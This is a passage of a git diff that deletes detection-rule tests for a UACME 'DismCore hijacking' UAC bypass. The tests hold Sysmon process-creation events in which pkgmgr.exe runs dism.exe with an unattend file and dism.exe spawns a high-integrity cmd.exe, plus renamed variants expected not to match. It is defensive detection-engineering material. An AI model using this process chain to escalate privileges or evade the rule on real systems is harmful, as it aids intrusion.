text\":\"\\\"C:\\\\Windows\\\\system32\\\\dism.exe\\\" /online /norestart /apply-unattend:\\\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\oemsetup.xml\\\"\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-56a3-5d45-0000-0020b3d31800", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "High", 
"object.account.session_id": "1627059", "object.process.cmdline": "\"C:\\Windows\\system32\\cmd.exe\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "747f3d96-78df-5d45-0000-0010ef400401", "object.process.hash.imphash": "272245E2988E1E430500B852C4FB5E18", "object.process.hash.md5": "975B45B669930B0CC773EAF2B414206F", "object.process.hash.sha1": "8C5437CD76A89EC983E3B364E219944DA3DAB464", "object.process.hash.sha256": "3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2", "object.process.id": "4320", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\dism.exe\" /online /norestart /apply-unattend:\"C:\\Users\\IEUser\\AppData\\Local\\Temp\\oemsetup.xml\"", "object.process.parent.fullpath": "c:\\windows\\system32\\dism.exe", "object.process.parent.guid": "747f3d96-78df-5d45-0000-0010bd350401", "object.process.parent.id": "5756", "object.process.parent.name": "dism.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-13T03:28:49.299Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1627059", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:07:55.471Z", "type": "raw", "uuid": "7f409354-c16a-40be-a457-830c0f8ed79e"}
-
-expect not {"correlation_name": "UACME_23_DismCore_Hijacking"}
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UACME_23_DismCore_Hijacking/tests/test_4.sc b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UACME_23_DismCore_Hijacking/tests/test_4.sc
deleted file mode 100644
index b02cc1c6..00000000
--- a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UACME_23_DismCore_Hijacking/tests/test_4.sc
+++ /dev/null
@@ -1,4 +0,0 @@ -{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:06:55.6206002Z\"},\"EventRecordID\":\"5434\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:06:55.343\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010bd350401}\"},{\"Name\":\"ProcessId\",\"text\":\"5756\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\someprocess.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Dism Image Servicing Utility\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\someprocess.exe\\\" /online /norestart 
/apply-unattend:\\\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\oemsetup.xml\\\"\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-56a3-5d45-0000-0020b3d31800}\"},{\"Name\":\"LogonId\",\"text\":\"0x18d3b3\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=0E1605A2115AE2AF4D95CF4D613E9F4C35C2832B,MD5=5DA4BB31F15D76DBE31CE8C170A9930D,SHA256=34FEEB2ED81F9B52A03DD33A46A382883DA0B27CF1026F26C63DF8DB3814B196,IMPHASH=497B8A05ACC6B88AC41DD94255FC8AFF\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010622f0401}\"},{\"Name\":\"ParentProcessId\",\"text\":\"216\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\PkgMgr.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\pkgmgr.exe\\\" /n:C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\oemsetup.xml\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-56a3-5d45-0000-0020b3d31800", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "1627059", "object.process.cmdline": 
"\"C:\\Windows\\system32\\someprocess.exe\" /online /norestart /apply-unattend:\"C:\\Users\\IEUser\\AppData\\Local\\Temp\\oemsetup.xml\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\someprocess.exe", "object.process.guid": "747f3d96-78df-5d45-0000-0010bd350401", "object.process.hash.imphash": "497B8A05ACC6B88AC41DD94255FC8AFF", "object.process.hash.md5": "5DA4BB31F15D76DBE31CE8C170A9930D", "object.process.hash.sha1": "0E1605A2115AE2AF4D95CF4D613E9F4C35C2832B", "object.process.hash.sha256": "34FEEB2ED81F9B52A03DD33A46A382883DA0B27CF1026F26C63DF8DB3814B196", "object.process.id": "5756", "object.process.meta": "Description:Dism Image Servicing Utility | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "someprocess.exe", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\pkgmgr.exe\" /n:C:\\Users\\IEUser\\AppData\\Local\\Temp\\oemsetup.xml", "object.process.parent.fullpath": "c:\\windows\\system32\\pkgmgr.exe", "object.process.parent.guid": "747f3d96-78df-5d45-0000-0010622f0401", "object.process.parent.id": "216", "object.process.parent.name": "pkgmgr.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-13T03:28:03.998Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1627059", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:06:55.343Z", "type": "raw", "uuid": "c4267ff3-ae1c-408c-a428-f39ee70fcae7"} -{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:06:55.8204069Z\"},\"EventRecordID\":\"5435\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:06:55.471\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010ef400401}\"},{\"Name\":\"ProcessId\",\"text\":\"4320\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Command Processor\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft 
Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-56a3-5d45-0000-0020b3d31800}\"},{\"Name\":\"LogonId\",\"text\":\"0x18d3b3\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010bd350401}\"},{\"Name\":\"ParentProcessId\",\"text\":\"5756\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\Dism.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\dism.exe\\\" /online /norestart /apply-unattend:\\\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\oemsetup.xml\\\"\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-56a3-5d45-0000-0020b3d31800", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "High", 
"object.account.session_id": "1627059", "object.process.cmdline": "\"C:\\Windows\\system32\\cmd.exe\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "747f3d96-78df-5d45-0000-0010ef400401", "object.process.hash.imphash": "272245E2988E1E430500B852C4FB5E18", "object.process.hash.md5": "975B45B669930B0CC773EAF2B414206F", "object.process.hash.sha1": "8C5437CD76A89EC983E3B364E219944DA3DAB464", "object.process.hash.sha256": "3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2", "object.process.id": "4320", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\dism.exe\" /online /norestart /apply-unattend:\"C:\\Users\\IEUser\\AppData\\Local\\Temp\\oemsetup.xml\"", "object.process.parent.fullpath": "c:\\windows\\system32\\dism.exe", "object.process.parent.guid": "747f3d96-78df-5d45-0000-0010bd350401", "object.process.parent.id": "5756", "object.process.parent.name": "dism.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-13T03:28:49.299Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1627059", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:06:55.471Z", "type": "raw", "uuid": "7f409354-c16a-40be-a457-830c0f8ed79e"} - -expect not {"correlation_name": "UACME_23_DismCore_Hijacking"} 
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UACME_23_DismCore_Hijacking/tests/test_5.sc b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UACME_23_DismCore_Hijacking/tests/test_5.sc
deleted file mode 100644
index e914b146..00000000
--- a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UACME_23_DismCore_Hijacking/tests/test_5.sc
+++ /dev/null
@@ -1,4 +0,0 @@ -{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:06:55.6206002Z\"},\"EventRecordID\":\"5434\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:06:55.343\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010bd350401}\"},{\"Name\":\"ProcessId\",\"text\":\"5756\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\Dism.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Dism Image Servicing Utility\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\dism.exe\\\" /online /norestart 
/apply-unattend:\\\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\oemsetup.xml\\\"\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-56a3-5d45-0000-0020b3d31800}\"},{\"Name\":\"LogonId\",\"text\":\"0x18d3b3\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=0E1605A2115AE2AF4D95CF4D613E9F4C35C2832B,MD5=5DA4BB31F15D76DBE31CE8C170A9930D,SHA256=34FEEB2ED81F9B52A03DD33A46A382883DA0B27CF1026F26C63DF8DB3814B196,IMPHASH=497B8A05ACC6B88AC41DD94255FC8AFF\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010622f0401}\"},{\"Name\":\"ParentProcessId\",\"text\":\"216\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\parent.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\parent.exe\\\" /n:C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\oemsetup.xml\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-56a3-5d45-0000-0020b3d31800", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "1627059", "object.process.cmdline": 
"\"C:\\Windows\\system32\\dism.exe\" /online /norestart /apply-unattend:\"C:\\Users\\IEUser\\AppData\\Local\\Temp\\oemsetup.xml\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\dism.exe", "object.process.guid": "747f3d96-78df-5d45-0000-0010bd350401", "object.process.hash.imphash": "497B8A05ACC6B88AC41DD94255FC8AFF", "object.process.hash.md5": "5DA4BB31F15D76DBE31CE8C170A9930D", "object.process.hash.sha1": "0E1605A2115AE2AF4D95CF4D613E9F4C35C2832B", "object.process.hash.sha256": "34FEEB2ED81F9B52A03DD33A46A382883DA0B27CF1026F26C63DF8DB3814B196", "object.process.id": "5756", "object.process.meta": "Description:Dism Image Servicing Utility | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "dism.exe", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\parent.exe\" /n:C:\\Users\\IEUser\\AppData\\Local\\Temp\\oemsetup.xml", "object.process.parent.fullpath": "c:\\windows\\system32\\parent.exe", "object.process.parent.guid": "747f3d96-78df-5d45-0000-0010622f0401", "object.process.parent.id": "216", "object.process.parent.name": "parent.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-13T03:28:03.998Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1627059", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:06:55.343Z", "type": "raw", "uuid": "c4267ff3-ae1c-408c-a428-f39ee70fcae7"} -{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:06:55.8204069Z\"},\"EventRecordID\":\"5435\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:06:55.471\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010ef400401}\"},{\"Name\":\"ProcessId\",\"text\":\"4320\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Command Processor\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft 
Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-56a3-5d45-0000-0020b3d31800}\"},{\"Name\":\"LogonId\",\"text\":\"0x18d3b3\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010bd350401}\"},{\"Name\":\"ParentProcessId\",\"text\":\"5756\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\Dism.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\dism.exe\\\" /online /norestart /apply-unattend:\\\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\oemsetup.xml\\\"\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-56a3-5d45-0000-0020b3d31800", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "High", 
"object.account.session_id": "1627059", "object.process.cmdline": "\"C:\\Windows\\system32\\cmd.exe\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "747f3d96-78df-5d45-0000-0010ef400401", "object.process.hash.imphash": "272245E2988E1E430500B852C4FB5E18", "object.process.hash.md5": "975B45B669930B0CC773EAF2B414206F", "object.process.hash.sha1": "8C5437CD76A89EC983E3B364E219944DA3DAB464", "object.process.hash.sha256": "3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2", "object.process.id": "4320", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\dism.exe\" /online /norestart /apply-unattend:\"C:\\Users\\IEUser\\AppData\\Local\\Temp\\oemsetup.xml\"", "object.process.parent.fullpath": "c:\\windows\\system32\\dism.exe", "object.process.parent.guid": "747f3d96-78df-5d45-0000-0010bd350401", "object.process.parent.id": "5756", "object.process.parent.name": "dism.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-13T03:28:49.299Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1627059", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:06:55.471Z", "type": "raw", "uuid": "7f409354-c16a-40be-a457-830c0f8ed79e"} - -expect not {"correlation_name": "UACME_23_DismCore_Hijacking"} 
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UACME_23_DismCore_Hijacking/tests/test_6.sc b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UACME_23_DismCore_Hijacking/tests/test_6.sc
deleted file mode 100644
index 2da30529..00000000
--- a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UACME_23_DismCore_Hijacking/tests/test_6.sc
+++ /dev/null
@@ -1,4 +0,0 @@ -{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:06:55.6206002Z\"},\"EventRecordID\":\"5434\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:06:55.343\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010bd350401}\"},{\"Name\":\"ProcessId\",\"text\":\"5756\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\Dism.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Dism Image Servicing Utility\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\dism.exe\\\" /online /norestart 
/apply-unattend:\\\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\test.xml\\\"\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-56a3-5d45-0000-0020b3d31800}\"},{\"Name\":\"LogonId\",\"text\":\"0x18d3b3\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=0E1605A2115AE2AF4D95CF4D613E9F4C35C2832B,MD5=5DA4BB31F15D76DBE31CE8C170A9930D,SHA256=34FEEB2ED81F9B52A03DD33A46A382883DA0B27CF1026F26C63DF8DB3814B196,IMPHASH=497B8A05ACC6B88AC41DD94255FC8AFF\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010622f0401}\"},{\"Name\":\"ParentProcessId\",\"text\":\"216\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\PkgMgr.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\pkgmgr.exe\\\" 